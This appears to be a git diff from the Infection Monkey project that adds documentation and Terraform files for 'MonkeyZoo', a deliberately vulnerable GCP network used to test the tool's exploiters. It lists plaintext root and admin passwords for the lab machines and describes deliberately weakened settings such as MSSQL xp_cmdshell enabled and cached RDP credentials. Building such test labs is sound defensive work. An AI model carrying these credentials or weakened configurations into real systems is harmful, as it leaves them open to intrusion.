+[Getting started](#getting-started)
+[Using islands](#using-islands)
+[Running tests](#running-tests)
+[Machines’ legend](#machines-legend)
+[Machines](#machines)
+[Nr. 2 Hadoop](#_Toc526517182)
+[Nr. 3 Hadoop](#_Toc526517183)
+[Nr. 4 Elastic](#_Toc526517184)
+[Nr. 5 Elastic](#_Toc526517185)
+[Nr. 6 Sambacry](#_Toc536021459)
+[Nr. 7 Sambacry](#_Toc536021460)
+[Nr. 8 Shellshock](#_Toc536021461)
+[Nr. 9 Tunneling M1](#_Toc536021462)
+[Nr. 10 Tunneling M2](#_Toc536021463)
+[Nr. 11 SSH key steal](#_Toc526517190)
+[Nr. 12 SSH key steal](#_Toc526517191)
+[Nr. 13 RDP grinder](#_Toc526517192)
+[Nr. 14 Mimikatz](#_Toc536021467)
+[Nr. 15 Mimikatz](#_Toc536021468)
+[Nr. 16 MsSQL](#_Toc536021469)
+[Nr. 17 Upgrader](#_Toc536021470)
+[Nr. 18 WebLogic](#_Toc526517180)
+[Nr. 19 WebLogic](#_Toc526517181)
+[Nr. 20 SMB](#_Toc536021473)
+[Nr. 21 Scan](#_Toc526517196)
+[Nr. 22 Scan](#_Toc526517197)
+[Nr. 23 Struts2](#_Toc536021476)
+[Nr. 24 Struts2](#_Toc536021477)
+[Nr. 250 MonkeyIsland](#_Toc536021478)
+[Nr. 251 MonkeyIsland](#_Toc536021479)
+[Network topography](#network-topography)
+ +# Warning\! + +This project builds an intentionally +vulnerable network. Make sure not to add +production servers to the same network and leave it closed to the +public. + +# Introduction: + +MonkeyZoo is a Google Cloud Platform network deployed with terraform. +Terraform scripts allows you to quickly setup a network that’s full of +vulnerable machines to regression test monkey’s exploiters, evaluate +scanning times in a real-world scenario and many more. + +# Getting started: + +Requirements: +1. Have terraform installed. +2. Have a Google Cloud Platform account (upgraded if you want to test + whole network at once). + +To deploy: +1. Configure service account for your project: + + a. Create a service account and name it “your\_name-monkeyZoo-user” + + b. Give these permissions to your service account: + + **Compute Engine -> Compute Network Admin** + and + **Compute Engine -> Compute Instance Admin** + and + **Compute Engine -> Compute Security Admin** + and + **Service Account User** + + or + + **Project -> Owner** + + c. Download its **Service account key**. Select JSON format. +2. Get these permissions in monkeyZoo project for your service account (ask monkey developers to add them): + + a. **Compute Engine -\> Compute image user** +3. Change configurations located in the + ../monkey/envs/monkey\_zoo/terraform/config.tf file (don’t forget to + link to your service account key file): + + > provider "google" { + > + > project = "project-28054666" + > + > region = "europe-west3" + > + > zone = "europe-west3-b" + > + > credentials = "${file("project-92050661-9dae6c5a02fc.json")}" + > + > } + > + > service\_account\_email="test@project-925243.iam.gserviceaccount.com" + +4. Run terraform init + +To deploy the network run:
+`terraform plan` (review the changes it will make on GCP)
+`terraform apply` (creates 2 networks for machines)
+`terraform apply` (adds machines to these networks) + +# Using islands: + +###How to get into the islands: + +**island-linux-250:** SSH from GCP + +**island-windows-251:** In GCP/VM instances page click on +island-windows-251. Set password for your account and then RDP into +the island. + +###These are most common steps on monkey islands: + +####island-linux-250: + +To run monkey island:
+`sudo /usr/run\_island.sh`
+ +To run monkey:
+`sudo /usr/run\_monkey.sh`
+ +To update repository:
+`git pull /usr/infection_monkey`
+ +Update all requirements using deployment script:
+1\. `cd /usr/infection_monkey/deployment_scripts`
+2\. `./deploy_linux.sh "/usr/infection_monkey" "develop"`
+ +####island-windows-251: + +To run monkey island:
+Execute C:\\run\_monkey\_island.bat as administrator + +To run monkey:
+Execute C:\\run\_monkey.bat as administrator + +To update repository:
+1\. Open cmd as an administrator
+2\. `cd C:\infection_monkey`
+3\. `git pull` (updates develop branch)
+ +Update all requirements using deployment script:
+1. `cd C:\infection_monkey\deployment_scripts`
+2. `./run_script.bat "C:\infection_monkey" "develop"` + +# Running tests: + +Once you start monkey island you can import test configurations from +../monkey/envs/configs. + +fullTest.conf is a good config to start, because it covers all machines. + +# Machines: + +
Nr. 2 Hadoop +(10.2.2.2) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +JDK, + |
+
| Default server’s port: | +8020 | +
| Server’s config: | +Single node cluster | +
| Scan results: | +Machine exploited using Hadoop exploiter | +
| Notes: | ++ |
Nr. 3 Hadoop +(10.2.2.3) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +JDK, + |
+
| Default server’s port: | +8020 | +
| Server’s config: | +Single node cluster | +
| Scan results: | +Machine exploited using Hadoop exploiter | +
| Notes: | ++ |
Nr. 4 Elastic +(10.2.2.4) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +JDK, + |
+
| Default server’s port: | +9200 | +
| Server’s config: | +Default | +
| Scan results: | +Machine exploited using Elastic exploiter | +
| Notes: | +Quick tutorial on how to add entries (was useful when setting up). | +
| + | + |
Nr. 5 Elastic +(10.2.2.5) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +JDK, + |
+
| Default server’s port: | +9200 | +
| Server’s config: | +Default | +
| Scan results: | +Machine exploited using Elastic exploiter | +
| Notes: | +Quick tutorial on how to add entries (was useful when setting up). | +
Nr. 6 Sambacry +(10.2.2.6) |
+(Not implemented) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +Samba > 3.5.0 and < 4.6.4, 4.5.10 and 4.4.14 | +
| Default server’s port: | +- | +
| Root password: | +;^TK`9XN_x^ | +
| Server’s config: | ++ |
| Scan results: | +Machine exploited using Sambacry exploiter | +
| Notes: | ++ |
| + | + |
Nr. 7 Sambacry +(10.2.2.7) |
+(Not implemented) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x32 | +
| Software: | +Samba > 3.5.0 and < 4.6.4, 4.5.10 and 4.4.14 | +
| Default server’s port: | +- | +
| Root password: | +*.&A7/W}Rc$ | +
| Server’s config: | ++ |
| Scan results: | +Machine exploited using Sambacry exploiter | +
| Notes: | ++ |
Nr. 8 Shellshock +(10.2.2.8) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 12.04 LTS x64 | +
| Software: | +Apache2, bash 4.2. | +
| Default server’s port: | +80 | +
| Scan results: | +Machine exploited using Shellshock exploiter | +
| Notes: | +Vulnerable app is under /cgi-bin/test.cgi | +
| + | + |
Nr. 9 Tunneling M1 +(10.2.2.9, 10.2.1.9) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +OpenSSL | +
| Default service’s port: | +22 | +
| Root password: | +`))jU7L(w} | +
| Server’s config: | +Default | +
| Notes: | ++ |
Nr. 10 Tunneling M2 +(10.2.1.10) |
+(Exploitable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +OpenSSL | +
| Default service’s port: | +22 | +
| Root password: | +3Q=(Ge(+&w]* | +
| Server’s config: | +Default | +
| Notes: | +Accessible only trough Nr.9 | +
Nr. 11 SSH key steal. +(10.2.2.11) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +OpenSSL | +
| Default connection port: | +22 | +
| Root password: | +^NgDvY59~8 | +
| Server’s config: | +SSH keys to connect to NR. 11 | +
| Notes: | ++ |
| + | + |
Nr. 12 SSH key steal. +(10.2.2.12) |
+(Exploitable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +OpenSSL | +
| Default connection port: | +22 | +
| Root password: | +u?Sj5@6(-C | +
| Server’s config: | +SSH configured to allow connection from NR.10 | +
| Notes: | +Don’t add this machine’s credentials to exploit configuration. | +
| + | + |
Nr. 13 RDP grinder +(10.2.2.13) |
+(Not implemented) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +- | +
| Default connection port: | +3389 | +
| Root password: | +2}p}aR]&=M | +
| Scan results: | +Machine exploited using RDP grinder | +
| Server’s config: | +Remote desktop enabled +Admin user’s credentials: +m0nk3y, 2}p}aR]&=M |
+
| Notes: | ++ |
| + | + |
Nr. 14 Mimikatz +(10.2.2.14) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +- | +
| Admin password: | +Ivrrw5zEzs | +
| Server’s config: | +Has cashed mimikatz-15 RDP credentials +SMB turned on |
+
| Notes: | ++ |
Nr. 15 Mimikatz +(10.2.2.15) |
+(Exploitable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +- | +
| Admin password: | +pAJfG56JX>< | +
| Server’s config: | +It’s credentials are cashed at mimikatz-14 +SMB turned on |
+
| Notes: | +If you change this machine’s IP it won’t get exploited. | +
| + | + |
Nr. 16 MsSQL +(10.2.2.16) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +MSSQL Server | +
| Default service port: | +1433 | +
| Server’s config: | +xp_cmdshell feature enabled in MSSQL server |
+
| SQL server auth. creds: | +m0nk3y : Xk8VDTsC |
+
| Notes: | +Enabled SQL server browser service + + |
+
Nr. 17 Upgrader +(10.2.2.17) |
+(Not implemented) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Default service port: | +445 | +
| Root password: | +U??7ppG_ | +
| Server’s config: | +Turn on SMB | +
| Notes: | ++ |
| + | + |
Nr. 18 WebLogic +(10.2.2.18) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +JDK, + |
+
| Default server’s port: | +7001 | +
| Admin domain credentials: | +weblogic : B74Ot0c4 | +
| Server’s config: | +Default | +
| Notes: | ++ |
Nr. 19 WebLogic +(10.2.2.19) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +JDK, + |
+
| Default server’s port: | +7001 | +
| Admin servers credentials: | +weblogic : =ThS2d=m(`B | +
| Server’s config: | +Default | +
| Notes: | ++ |
Nr. 20 SMB +(10.2.2.20) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +- | +
| Default service’s port: | +445 | +
| Root password: | +YbS,<tpS.2av | +
| Server’s config: | +SMB turned on | +
| Notes: | ++ |
Nr. 21 Scan +(10.2.2.21) |
+(Secure) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +Apache tomcat 7.0.92 | +
| Default server’s port: | +8080 | +
| Server’s config: | +Default | +
| Notes: | +Used to scan a machine that has no vulnerabilities (to evaluate scanning speed for e.g.) | +
| + | + |
Nr. 22 Scan +(10.2.2.22) |
+(Secure) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +Apache tomcat 7.0.92 | +
| Default server’s port: | +8080 | +
| Server’s config: | +Default | +
| Notes: | +Used to scan a machine that has no vulnerabilities (to evaluate scanning speed for e.g.) | +
| + | + |
Nr. 23 Struts2 +(10.2.2.23) |
+(Vulnerable) | +
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +JDK, +struts2 2.3.15.1, +tomcat 9.0.0.M9 |
+
| Default server’s port: | +8080 | +
| Server’s config: | +Default | +
| Notes: | ++ |
Nr. 24 Struts2 +(10.2.2.24) |
+(Vulnerable) | +
|---|---|
| OS: | +Windows 10 x64 | +
| Software: | +JDK, +struts2 2.3.15.1, +tomcat 9.0.0.M9 |
+
| Default server’s port: | +8080 | +
| Server’s config: | +Default | +
| Notes: | ++ |
| + | + |
Nr. 250 MonkeyIsland +(10.2.2.250) |
++ |
|---|---|
| OS: | +Ubuntu 16.04.05 x64 | +
| Software: | +MonkeyIsland server, git, mongodb etc. | +
| Default server’s port: | +22, 443 | +
| Private key passphrase: | +- | +
| Notes: | +Only accessible trough GCP | +
| + | + |
Nr. 251 MonkeyIsland +(10.2.2.251) |
++ |
|---|---|
| OS: | +Windows Server 2016 x64 | +
| Software: | +MonkeyIsland server, git, mongodb etc. | +
| Default server’s port: | +3389, 443 | +
| Private key passphrase: | +- | +
| Notes: | +Only accessible trough GCP | +
| + | + |
diff --git a/envs/monkey_zoo/docs/images/networkTopography.jpg b/envs/monkey_zoo/docs/images/networkTopography.jpg
new file mode 100644
index 000000000..09130a251
Binary files /dev/null and b/envs/monkey_zoo/docs/images/networkTopography.jpg differ
diff --git a/envs/monkey_zoo/terraform/config.tf b/envs/monkey_zoo/terraform/config.tf
new file mode 100644
index 000000000..c6108865a
--- /dev/null
+++ b/envs/monkey_zoo/terraform/config.tf
@@ -0,0 +1,10 @@
+provider "google" {
+ project = "test-000000"
+ region = "europe-west3"
+ zone = "europe-west3-b"
+ credentials = "${file("testproject-000000-0c0b000b00c0.json")}"
+}
+locals {
+ service_account_email="tester-monkeyZoo-user@testproject-000000.iam.gserviceaccount.com"
+ monkeyzoo_project="guardicore-22050661"
+}
\ No newline at end of file
diff --git a/envs/monkey_zoo/terraform/firewalls.tf b/envs/monkey_zoo/terraform/firewalls.tf
new file mode 100644
index 000000000..df33ed4d4
--- /dev/null
+++ b/envs/monkey_zoo/terraform/firewalls.tf
@@ -0,0 +1,76 @@
+resource "google_compute_firewall" "islands-in" {
+ name = "islands-in"
+ network = "${google_compute_network.monkeyzoo.name}"
+
+ allow {
+ protocol = "tcp"
+ ports = ["22", "443", "3389", "5000"]
+ }
+
+ direction = "INGRESS"
+ priority = "65534"
+ target_tags = ["island"]
+}
+
+resource "google_compute_firewall" "islands-out" {
+ name = "islands-out"
+ network = "${google_compute_network.monkeyzoo.name}"
+
+ allow {
+ protocol = "tcp"
+ }
+
+ direction = "EGRESS"
+ priority = "65534"
+ target_tags = ["island"]
+}
+
+resource "google_compute_firewall" "monkeyzoo-in" {
+ name = "monkeyzoo-in"
+ network = "${google_compute_network.monkeyzoo.name}"
+
+ allow {
+ protocol = "all"
+ }
+
+ direction = "INGRESS"
+ priority = "65534"
+ source_ranges = ["10.2.2.0/24"]
+}
+
+resource "google_compute_firewall" "monkeyzoo-out" {
+ name = "monkeyzoo-out"
+ network = "${google_compute_network.monkeyzoo.name}"
+
+ allow {
+ protocol = "all"
+ }
+
+ direction = "EGRESS"
+ priority = "65534"
+ destination_ranges = ["10.2.2.0/24"]
+}
+
+resource "google_compute_firewall" "tunneling-in" {
+ name = "tunneling-in"
+ network = "${google_compute_network.tunneling.name}"
+
+ allow {
+ protocol = "all"
+ }
+
+ direction = "INGRESS"
+ source_ranges = ["10.2.1.0/28"]
+}
+
+resource "google_compute_firewall" "tunneling-out" {
+ name = "tunneling-out"
+ network = "${google_compute_network.tunneling.name}"
+
+ allow {
+ protocol = "all"
+ }
+
+ direction = "EGRESS"
+ destination_ranges = ["10.2.1.0/28"]
+}
diff --git a/envs/monkey_zoo/terraform/images.tf b/envs/monkey_zoo/terraform/images.tf
new file mode 100644
index 000000000..4677d0c1b
--- /dev/null
+++ b/envs/monkey_zoo/terraform/images.tf
@@ -0,0 +1,91 @@
+//Custom cloud images
+data "google_compute_image" "hadoop-2" {
+ name = "hadoop-2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "hadoop-3" {
+ name = "hadoop-3"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "elastic-4" {
+ name = "elastic-4"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "elastic-5" {
+ name = "elastic-5"
+ project = "${local.monkeyzoo_project}"
+}
+
+/*
+data "google_compute_image" "sambacry-6" {
+ name = "sambacry-6"
+}
+*/
+data "google_compute_image" "shellshock-8" {
+ name = "shellshock-8"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "tunneling-9" {
+ name = "tunneling-9-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "tunneling-10" {
+ name = "tunneling-10-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "sshkeys-11" {
+ name = "sshkeys-11-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "sshkeys-12" {
+ name = "sshkeys-12-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "mimikatz-14" {
+ name = "mimikatz-14-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "mimikatz-15" {
+ name = "mimikatz-15"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "mssql-16" {
+ name = "mssql-16"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "weblogic-18" {
+ name = "weblogic-18"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "weblogic-19" {
+ name = "weblogic-19-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "smb-20" {
+ name = "smb-20"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "scan-21" {
+ name = "scan-21"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "scan-22" {
+ name = "scan-22"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "struts2-23" {
+ name = "struts2-23"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "struts2-24" {
+ name = "struts-24-v2"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "island-linux-250" {
+ name = "island-linux-250"
+ project = "${local.monkeyzoo_project}"
+}
+data "google_compute_image" "island-windows-251" {
+ name = "island-windows-251"
+ project = "${local.monkeyzoo_project}"
+}
\ No newline at end of file
diff --git a/envs/monkey_zoo/terraform/monkey_zoo.tf b/envs/monkey_zoo/terraform/monkey_zoo.tf
new file mode 100644
index 000000000..e0b97822f
--- /dev/null
+++ b/envs/monkey_zoo/terraform/monkey_zoo.tf
@@ -0,0 +1,431 @@
+
+// Local variables
+locals {
+ default_ubuntu="${google_compute_instance_template.ubuntu16.self_link}"
+ default_windows="${google_compute_instance_template.windows2016.self_link}"
+}
+
+resource "google_compute_network" "monkeyzoo" {
+ name = "monkeyzoo"
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_network" "tunneling" {
+ name = "tunneling"
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "monkeyzoo-main" {
+ name = "monkeyzoo-main"
+ ip_cidr_range = "10.2.2.0/24"
+ network = "${google_compute_network.monkeyzoo.self_link}"
+}
+
+resource "google_compute_subnetwork" "tunneling-main" {
+ name = "tunneling-main"
+ ip_cidr_range = "10.2.1.0/28"
+ network = "${google_compute_network.tunneling.self_link}"
+}
+
+resource "google_compute_instance_from_template" "hadoop-2" {
+ name = "hadoop-2"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.hadoop-2.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.2"
+ }
+ // Add required ssh keys for hadoop service and restart it
+ metadata_startup_script = "[ ! -f /home/vakaris_zilius/.ssh/authorized_keys ] && sudo cat /home/vakaris_zilius/.ssh/id_rsa.pub >> /home/vakaris_zilius/.ssh/authorized_keys && sudo reboot"
+}
+
+resource "google_compute_instance_from_template" "hadoop-3" {
+ name = "hadoop-3"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.hadoop-3.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.3"
+ }
+}
+
+resource "google_compute_instance_from_template" "elastic-4" {
+ name = "elastic-4"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.elastic-4.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.4"
+ }
+}
+
+resource "google_compute_instance_from_template" "elastic-5" {
+ name = "elastic-5"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.elastic-5.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.5"
+ }
+}
+
+/* Couldn't find ubuntu packages for required samba version (too old).
+resource "google_compute_instance_from_template" "sambacry-6" {
+ name = "sambacry-6"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.sambacry-6.self_link}"
+ }
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.6"
+ }
+}
+*/
+
+/* We need custom 32 bit Ubuntu machine for this (there are no 32 bit ubuntu machines in GCP).
+resource "google_compute_instance_from_template" "sambacry-7" {
+ name = "sambacry-7"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk {
+ initialize_params {
+ // Add custom image to cloud
+ image = "ubuntu32"
+ }
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.7"
+ }
+}
+*/
+
+resource "google_compute_instance_from_template" "shellshock-8" {
+ name = "shellshock-8"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.shellshock-8.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.8"
+ }
+}
+
+resource "google_compute_instance_from_template" "tunneling-9" {
+ name = "tunneling-9"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.tunneling-9.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface{
+ subnetwork="tunneling-main"
+ network_ip="10.2.1.9"
+
+ }
+ network_interface{
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.9"
+ }
+}
+
+resource "google_compute_instance_from_template" "tunneling-10" {
+ name = "tunneling-10"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.tunneling-10.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface{
+ subnetwork="tunneling-main"
+ network_ip="10.2.1.10"
+ }
+}
+
+resource "google_compute_instance_from_template" "sshkeys-11" {
+ name = "sshkeys-11"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.sshkeys-11.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.11"
+ }
+}
+
+resource "google_compute_instance_from_template" "sshkeys-12" {
+ name = "sshkeys-12"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.sshkeys-12.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.12"
+ }
+}
+
+/*
+resource "google_compute_instance_from_template" "rdpgrinder-13" {
+ name = "rdpgrinder-13"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.rdpgrinder-13.self_link}"
+ }
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.13"
+ }
+}
+*/
+
+resource "google_compute_instance_from_template" "mimikatz-14" {
+ name = "mimikatz-14"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.mimikatz-14.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.14"
+ }
+}
+
+resource "google_compute_instance_from_template" "mimikatz-15" {
+ name = "mimikatz-15"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.mimikatz-15.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.15"
+ }
+}
+
+resource "google_compute_instance_from_template" "mssql-16" {
+ name = "mssql-16"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.mssql-16.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.16"
+ }
+}
+
+/* We need to alter monkey's behavior for this to upload 32-bit monkey instead of 64-bit (not yet developed)
+resource "google_compute_instance_from_template" "upgrader-17" {
+ name = "upgrader-17"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.upgrader-17.self_link}"
+ }
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.17"
+ access_config {
+ // Cheaper, non-premium routing
+ network_tier = "STANDARD"
+ }
+ }
+}
+*/
+
+resource "google_compute_instance_from_template" "weblogic-18" {
+ name = "weblogic-18"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.weblogic-18.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.18"
+ }
+}
+
+resource "google_compute_instance_from_template" "weblogic-19" {
+ name = "weblogic-19"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.weblogic-19.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.19"
+ }
+}
+
+resource "google_compute_instance_from_template" "smb-20" {
+ name = "smb-20"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.smb-20.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.20"
+ }
+}
+
+resource "google_compute_instance_from_template" "scan-21" {
+ name = "scan-21"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.scan-21.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.21"
+ }
+}
+
+resource "google_compute_instance_from_template" "scan-22" {
+ name = "scan-22"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.scan-22.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.22"
+ }
+}
+
+resource "google_compute_instance_from_template" "struts2-23" {
+ name = "struts2-23"
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.struts2-23.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.23"
+ }
+}
+
+resource "google_compute_instance_from_template" "struts2-24" {
+ name = "struts2-24"
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.struts2-24.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.24"
+ }
+}
+
+resource "google_compute_instance_from_template" "island-linux-250" {
+ name = "island-linux-250"
+ machine_type = "n1-standard-2"
+ tags = ["island", "linux", "ubuntu16"]
+ source_instance_template = "${local.default_ubuntu}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.island-linux-250.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.250"
+ access_config {
+ // Cheaper, non-premium routing (not available in some regions)
+ // network_tier = "STANDARD"
+ }
+ }
+}
+
+resource "google_compute_instance_from_template" "island-windows-251" {
+ name = "island-windows-251"
+ machine_type = "n1-standard-2"
+ tags = ["island", "windows", "windowsserver2016"]
+ source_instance_template = "${local.default_windows}"
+ boot_disk{
+ initialize_params {
+ image = "${data.google_compute_image.island-windows-251.self_link}"
+ }
+ auto_delete = true
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ network_ip="10.2.2.251"
+ access_config {
+ // Cheaper, non-premium routing (not available in some regions)
+ // network_tier = "STANDARD"
+ }
+ }
+}
\ No newline at end of file
diff --git a/envs/monkey_zoo/terraform/templates.tf b/envs/monkey_zoo/terraform/templates.tf
new file mode 100644
index 000000000..ed48864d9
--- /dev/null
+++ b/envs/monkey_zoo/terraform/templates.tf
@@ -0,0 +1,45 @@
+resource "google_compute_instance_template" "ubuntu16" {
+ name = "ubuntu16"
+ description = "Creates ubuntu 16.04 LTS servers at europe-west3-a."
+
+ tags = ["test-machine", "ubuntu16", "linux"]
+
+ machine_type = "n1-standard-1"
+ can_ip_forward = false
+
+ disk {
+ source_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ access_config {
+ // Cheaper, non-premium routing
+ network_tier = "STANDARD"
+ }
+ }
+ service_account {
+ email ="${local.service_account_email}"
+ scopes=["cloud-platform"]
+ }
+}
+
+resource "google_compute_instance_template" "windows2016" {
+ name = "windows2016"
+ description = "Creates windows 2016 core servers at europe-west3-a."
+
+ tags = ["test-machine", "windowsserver2016", "windows"]
+
+ machine_type = "n1-standard-1"
+ can_ip_forward = false
+
+ disk {
+ source_image = "windows-cloud/windows-2016"
+ }
+ network_interface {
+ subnetwork="monkeyzoo-main"
+ }
+ service_account {
+ email="${local.service_account_email}"
+ scopes=["cloud-platform"]
+ }
+}
\ No newline at end of file
diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py
new file mode 100644
index 000000000..c7d2dc62c
--- /dev/null
+++ b/monkey/common/utils/attack_utils.py
@@ -0,0 +1,10 @@
+from enum import Enum
+
+
+class ScanStatus(Enum):
+ # Technique wasn't scanned
+ UNSCANNED = 0
+ # Technique was attempted/scanned
+ SCANNED = 1
+ # Technique was attempted and succeeded
+ USED = 2
diff --git a/monkey/common/utils/exploit_enum.py b/monkey/common/utils/exploit_enum.py
